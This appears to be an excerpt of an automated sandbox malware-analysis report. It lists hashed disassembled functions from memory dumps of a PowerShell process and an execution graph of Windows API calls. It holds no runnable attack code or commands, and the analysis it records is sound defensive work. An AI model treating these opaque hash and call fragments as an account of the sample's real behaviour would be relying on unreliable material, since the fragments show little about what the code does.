                                                                                                                                                                                                    • Instruction ID: 4769f3453015fdedaa9bc21bafe7dba314cb386fcb50a8eedcec87e3b53d053e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e7d188c3f914eabbbcf7da06739a7b637b2a7be1020e7cd76e8725277f65a13
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA01E475E0424A8FCB40CF68D485AAEBFF1AF49214F604199D909DB762D631A981CF81
                                                                                                                                                                                                    Function 07FD8399 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 624fb9d1fb4c9a9bdc84d0361f0283c509bb4241a6225a186b31f7f41404b1a0
                                                                                                                                                                                                    • Instruction ID: ce13f71faefc612b02a15e02fe2959a82f44e518353ead67546d55bc45523da8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 624fb9d1fb4c9a9bdc84d0361f0283c509bb4241a6225a186b31f7f41404b1a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AF01D36D105599FCB04DF94D8508EDBB75FF95310F518159E54537224EB30AA8ACBA0
                                                                                                                                                                                                    Function 07FD8750 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 99e9031cb650287e238eb1e391d015a9a379e3f6392f2ba0fd4c360652687054
                                                                                                                                                                                                    • Instruction ID: a412dc62abe041d82706d64fd1dccf660e8efd4e0593b63178402f319b3b72f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99e9031cb650287e238eb1e391d015a9a379e3f6392f2ba0fd4c360652687054
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E02631A5E1901FC7224339F848CDBBFB8DE8226970802EFF085DB162C160AC0CCB91
                                                                                                                                                                                                    Function 043F6CF0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 51497325f9d3a7004db4a5d549d32ea76cfb948af8badd31ed3bb090736c32a0
                                                                                                                                                                                                    • Instruction ID: da1f0a61f8bf549a8a22dfd66a03adae6a320c47e229ca48bf16998946fd285a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51497325f9d3a7004db4a5d549d32ea76cfb948af8badd31ed3bb090736c32a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0A974E0020A8FC780DF68C485AAEBBF4FF49314F5051A9E509DB321E730A945CF91
                                                                                                                                                                                                    Function 07FD8468 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: e790379112083ac6f86f4250f539940299ca3a6bbb45bc505a58603e32747e51
                                                                                                                                                                                                    • Instruction ID: 8b0f551dd020d188c02195d06279d859aace3e9bc993a659feacdf80add36d75
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e790379112083ac6f86f4250f539940299ca3a6bbb45bc505a58603e32747e51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54E04F39316424CFCA046BA9B01C4EDB7AAEF89676704005FF50EC3B42CB795CA287C5
                                                                                                                                                                                                    Function 07FD9F80 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0e4717b7e4d65e07c16741405a32ef6e04b0164a32d1e202c93496bbad683f6b
                                                                                                                                                                                                    • Instruction ID: 2614d50386c93dd3dc7bf1956df3966ae62857dab67016e92201db08a0cc1a0b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e4717b7e4d65e07c16741405a32ef6e04b0164a32d1e202c93496bbad683f6b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E0EDF0E0430EAF8F84EFF994421BEBBF1EB48200F04856B9919E3340E6385A018F95
                                                                                                                                                                                                    Function 07FD8581 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 3225c5066d896b134aa8a4d1bf2d8c20eb5566175e3b1e7f343e15c8ace4f551
                                                                                                                                                                                                    • Instruction ID: 76142cb728b6496c7d6b8aad73c224eb106102662efedc1845027e3f6eef1ef0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3225c5066d896b134aa8a4d1bf2d8c20eb5566175e3b1e7f343e15c8ace4f551
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E0207240A2C95EC712DB74D8116E97FB4CF11151F1881FBDC40C2102D1288714C7A2
                                                                                                                                                                                                    Function 07273A80 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 9c77027bd19bd83e35b5e333c0e23da4e8d017afd8fac529c59ff95bd78b03fd
                                                                                                                                                                                                    • Instruction ID: c600c61b4ec466cc75ab6bf8221b9b3e33eef6f75cac760ba88f1221e76d0b2c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c77027bd19bd83e35b5e333c0e23da4e8d017afd8fac529c59ff95bd78b03fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE092702007185BCA307BAD9C0A54FBA66AF427B87100728F2B15FBE4CB72A80187D1
                                                                                                                                                                                                    Function 07FD9F90 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 5b04f6dcf224a32776e151bcb7ac9d30a4d16009f598d7e1a6e7440d31fd24f7
                                                                                                                                                                                                    • Instruction ID: e475c3631fec081c0a41a959b1c3493a7c9b09d2cd27abd657b10fd40ef3752a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b04f6dcf224a32776e151bcb7ac9d30a4d16009f598d7e1a6e7440d31fd24f7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0E0B6B4D0420E9F8F48DFB994421BEFBF5AB08200F00856E9819E3300E6395A018F95
                                                                                                                                                                                                    Function 07FD9F50 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0e70b808b302a57ff418c6aa1d3d9aa8459635d4ddfaa3be9a5bd8ce5d2a2b93
                                                                                                                                                                                                    • Instruction ID: 019c04b96f202bc247b33dcd9d7ab9f778f0ddb68efe2d0f6f8f2de087da6853
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e70b808b302a57ff418c6aa1d3d9aa8459635d4ddfaa3be9a5bd8ce5d2a2b93
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FD05E6A0483859BD30753B060183E17FAAC702212F0D00D6D0D587453858579868392
                                                                                                                                                                                                    Function 07FD3794 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1f532c333d58c88cdd7bfe991d724e475334b188f1d93be872f23ba0e71cc447
                                                                                                                                                                                                    • Instruction ID: c01ea0145a5c235fe3ea882a50cbd748647e3d2d90d95865c6f29ae247addbd1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f532c333d58c88cdd7bfe991d724e475334b188f1d93be872f23ba0e71cc447
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D01276300055DB8B015F56F8589BE7B69FF89222708402FF555C5011CB318471DB70
                                                                                                                                                                                                    Function 07FD836B Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 6813e0a08b0e5494f14c558ac5e3988f44c569cf2d85408a00b2f6611cf93c98
                                                                                                                                                                                                    • Instruction ID: 70f377724876e0962494a0c1fad00376ac000a73fd9b72da2a32a796a5172f35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6813e0a08b0e5494f14c558ac5e3988f44c569cf2d85408a00b2f6611cf93c98
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD09EB084110ACBDB10DF80C2197AE7B71AB00345F2C0815D006B6180DBB55E55DB91
                                                                                                                                                                                                    Function 07FD3760 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ce3e1b22bdf5226e7c1b25707cb715c50e20c5446f5ddf12c402101b312ea83f
                                                                                                                                                                                                    • Instruction ID: 1b1f3c05df68a4202f19eb498e2a952b887093c7351a3fdfa7eaf4a9b7d24c35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3e1b22bdf5226e7c1b25707cb715c50e20c5446f5ddf12c402101b312ea83f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4B092310082526ADA8156619808B2BBEA4AF91382F00840AB6C8800A1C12080A4DB22

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 07274210 Relevance: 16.7, Strings: 13, Instructions: 439COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2322485398
                                                                                                                                                                                                    • Opcode ID: ccfd0099acf11bd77c7c269397b4e322b7aa7de1775139741924e54517441d7c
                                                                                                                                                                                                    • Instruction ID: 1db9e90ca970fd6b202d51431b67621132ae5941ac5360adf6856134733ce92d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccfd0099acf11bd77c7c269397b4e322b7aa7de1775139741924e54517441d7c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E16CB1B203978FCB25AB69961456ABBF5AF86310F2480ABD505CF352DF31CC45CBA1
                                                                                                                                                                                                    Function 07272A28 Relevance: 11.7, Strings: 9, Instructions: 483COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2378468523
                                                                                                                                                                                                    • Opcode ID: b35ebbbc46ce83ee3a32a8c8c1d74f15d3f06f9518dd2dbc45a658cc8b06c22b
                                                                                                                                                                                                    • Instruction ID: 88f895018815c547e1b464f74187532a4e1b93df693ea7adce27b6c17525195e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b35ebbbc46ce83ee3a32a8c8c1d74f15d3f06f9518dd2dbc45a658cc8b06c22b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F126B2B24257CFC7298B699A0066ABBF2BFC5310F1884ABD445CF352DB35D845C7A1
                                                                                                                                                                                                    Function 07271BF0 Relevance: 6.5, Strings: 5, Instructions: 277COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-578306960
                                                                                                                                                                                                    • Opcode ID: a103344842de32036ea72de9734a50b7e1af51ceae4d7f3bdc6e330801196d65
                                                                                                                                                                                                    • Instruction ID: 164a15ed6d6c0983e7d20635ac2583e4fcd7362440b516a15fd9ae335eeadbd8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a103344842de32036ea72de9734a50b7e1af51ceae4d7f3bdc6e330801196d65
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C91ACB271435A8FC7298BA9990066ABBF6EFC6310F1484AFD545CF351CA31CC15C7A2
                                                                                                                                                                                                    Function 07278AD0 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                                                                    • Opcode ID: e5f10c3215e747cafb066c4218ca5842273231274c0ecd7dc29df90d20b3b5c3
                                                                                                                                                                                                    • Instruction ID: fe5e312abc0c76f4411624b1997e2d011f4cd9902b465b3692ec91b028e414cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5f10c3215e747cafb066c4218ca5842273231274c0ecd7dc29df90d20b3b5c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 615136B172534B8FD7284A699A0877BBBA6AFC1710F28847FD545CB241DE35C885C361
                                                                                                                                                                                                    Function 0727420E Relevance: 6.3, Strings: 5, Instructions: 78COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-324510305
                                                                                                                                                                                                    • Opcode ID: 752e45d90644a381b9a4eaa834584b542e1d753e99007da48c8e11f4aae07b67
                                                                                                                                                                                                    • Instruction ID: f1d7df646c797b0038ceb796db2bf2393dcbea8b82ff5ef318ebed54bf4bf07f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 752e45d90644a381b9a4eaa834584b542e1d753e99007da48c8e11f4aae07b67
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 362148F2A30297CFCB24AF55CA44D69B7F4AF81610F25415AE8049F351CB31DD14CBA1
                                                                                                                                                                                                    Function 072751B0 Relevance: 5.3, Strings: 4, Instructions: 251COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-263804196
                                                                                                                                                                                                    • Opcode ID: f6fa6ff8f61187b4d75a8a297c7508853f0a8975e9df4eeda577b27545be3164
                                                                                                                                                                                                    • Instruction ID: 643c5b48b3731374d898849ce163abd6231c0f84d198398f06c96a1eb71e0a26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6fa6ff8f61187b4d75a8a297c7508853f0a8975e9df4eeda577b27545be3164
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B815571B10215AFCB249B6AD914B6AFBE2AFC5710F24C06AE805DF391CE72DC41C7A1
                                                                                                                                                                                                    Function 0727A968 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2125118731
                                                                                                                                                                                                    • Opcode ID: 385831850c921075e4e3f5fd8a1f143c67ccde367643aa4df39c7e4aa8f4d449
                                                                                                                                                                                                    • Instruction ID: ad9d35bcb36a34645f90dc3f49058a05973f8bb5f689fe8c44fb1c5ce0a7459d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 385831850c921075e4e3f5fd8a1f143c67ccde367643aa4df39c7e4aa8f4d449
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB2105B273030B9BD7245A3E9E00B6BB6F69BC1721F24C43AA50ACB385DD75D941C3A1
                                                                                                                                                                                                    Function 0727030A Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2049395529
                                                                                                                                                                                                    • Opcode ID: d0afeb733ee23cf62754204f8021db42c6a0afd17fd6abd5cabdc52a33eda2cd
                                                                                                                                                                                                    • Instruction ID: 19dcf14f419c7774fb16e324639368759bf8121e8a1bb7dc5f11a137fe46a619
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0afeb733ee23cf62754204f8021db42c6a0afd17fd6abd5cabdc52a33eda2cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01B161A193964FC73B12281A204A66FB25BC3A1031900DBC041DF396CE744C4EC3B3

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:4.6%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:7.3%
                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                    Total number of Limit Nodes:101
                                                                                                                                                                                                    execution_graph 94966 687e1dfc 94967 687e1e0b 94966->94967 94968 687ec840 94966->94968 94973 687e1d3f 94967->94973 94999 687ec84a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 94968->94999 94971 687ec845 94971->94971 94972 687e1e16 94974 687e1d4b __tmpnam_helper 94973->94974 94975 687e1d57 94974->94975 94976 687eb8b1 94974->94976 94977 687e1d61 94975->94977 94998 687eb8fd 94975->94998 95006 687eb359 HeapCreate 94976->95006 94979 687e1d6a __set_flsgetvalue TlsGetValue 94977->94979 94980 687e2967 94977->94980 94983 687e1d83 94979->94983 94988 687e1dd1 __tmpnam_helper 94980->94988 95007 687e28f9 TlsGetValue TlsGetValue DecodePointer _freefls TlsSetValue 94980->95007 94981 687f7b4e 94986 68807452 __ioterm 94981->94986 94987 687f7b5c 94981->94987 94982 68807448 _cexit 94982->94986 94983->94988 95000 687e1e1c 94983->95000 94985 687f7b7e __ioterm 94985->94987 94992 6880745c 94986->94992 94987->94985 94988->94972 94991 687e1d9f DecodePointer 94993 687e1db4 94991->94993 94996 68807484 free 94992->94996 94995 687e1dbc _initptd GetCurrentThreadId 94993->94995 94993->94996 94994 687eb8b6 94994->94987 94997 687eb8dd GetCommandLineA GetCommandLineW 94994->94997 94995->94988 94996->94987 94997->94998 94998->94981 94998->94982 94998->94985 94998->94987 94999->94971 95003 687e1e25 95000->95003 95002 687e1d93 95002->94987 95002->94991 95003->95002 95004 6880f1d0 Sleep 95003->95004 95008 687e09a9 95003->95008 95005 687e1e45 95004->95005 95005->95002 95005->95003 95006->94994 95007->94988 95009 687e09b5 95008->95009 95010 687e09df RtlAllocateHeap 95009->95010 95011 6880f3f5 _callnewh 95009->95011 95012 687e09f6 __wexecvpe 95009->95012 95010->95009 95010->95012 95011->95009 95011->95012 95012->95003 95013 11025b00 95014 1110c760 95013->95014 95015 1110c781 95014->95015 95016 1110c76c 95014->95016 95017 1110c794 95014->95017 95022 1110c6b0 95015->95022 95016->95017 95019 1110c6b0 7 API calls 95016->95019 95021 1110c775 95019->95021 95020 1110c788 95023 1110c6f4 EnterCriticalSection 95022->95023 95024 1110c6df InitializeCriticalSection 95022->95024 95027 1110c715 95023->95027 95024->95023 95025 1110c743 LeaveCriticalSection 95025->95020 95027->95025 95028 1110c650 95027->95028 95029 1110c667 EnterCriticalSection 95028->95029 95030 1110c65e GetCurrentThreadId 95028->95030 95031 1110c67e 95029->95031 95030->95029 95032 1110c685 LeaveCriticalSection 95031->95032 95033 1110c698 LeaveCriticalSection 95031->95033 95032->95027 95033->95027 95034 11141510 95035 11141523 std::ios_base::_Tidy 95034->95035 95038 1114158a std::ios_base::_Tidy 95035->95038 95039 11141545 GetLastError 95035->95039 95043 11141430 ExpandEnvironmentStringsA 95035->95043 95056 1116076b 95035->95056 95039->95035 95040 11141550 Sleep 95039->95040 95041 1116076b std::locale::_Init 139 API calls 95040->95041 95042 11141562 95041->95042 95042->95035 95042->95038 95044 11141467 95043->95044 95045 11141474 95044->95045 95046 11141484 std::locale::_Init 95044->95046 95047 1114149e 95044->95047 95059 1113e8f0 95045->95059 95050 11141495 GetModuleFileNameA 95046->95050 95076 11141240 95047->95076 95051 111414a4 95050->95051 95100 11080be0 95051->95100 95052 111414f8 95068 1115e4d1 95052->95068 95055 11141506 95055->95035 95403 111606af 95056->95403 95058 1116077d 95058->95035 95060 1113e8fa 95059->95060 95061 1113e8fc 95059->95061 95060->95052 95104 1110c4a0 95061->95104 95063 1113e922 95064 1113e92b _strncpy 95063->95064 95065 1113e949 95063->95065 95064->95052 95110 110290f0 261 API calls 2 library calls 95065->95110 95069 1115e4d9 95068->95069 95070 1115e4db IsDebuggerPresent 95068->95070 95069->95055 95112 11173e07 95070->95112 95073 11168469 SetUnhandledExceptionFilter UnhandledExceptionFilter 95074 11168486 __call_reportfault 95073->95074 95075 1116848e GetCurrentProcess TerminateProcess 95073->95075 95074->95075 95075->95055 95077 11141262 95076->95077 95081 11141279 std::locale::_Init 95076->95081 95134 110290f0 261 API calls 2 library calls 95077->95134 95079 11141407 95082 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 95079->95082 95081->95079 95083 111412ac GetModuleFileNameA 95081->95083 95084 11141423 95082->95084 95085 11080be0 std::locale::_Init IsDBCSLeadByte 95083->95085 95084->95051 95086 111412c1 95085->95086 95087 111412d1 SHGetFolderPathA 95086->95087 95088 111413b8 95086->95088 95090 111412fe 95087->95090 95091 1114131d SHGetFolderPathA 95087->95091 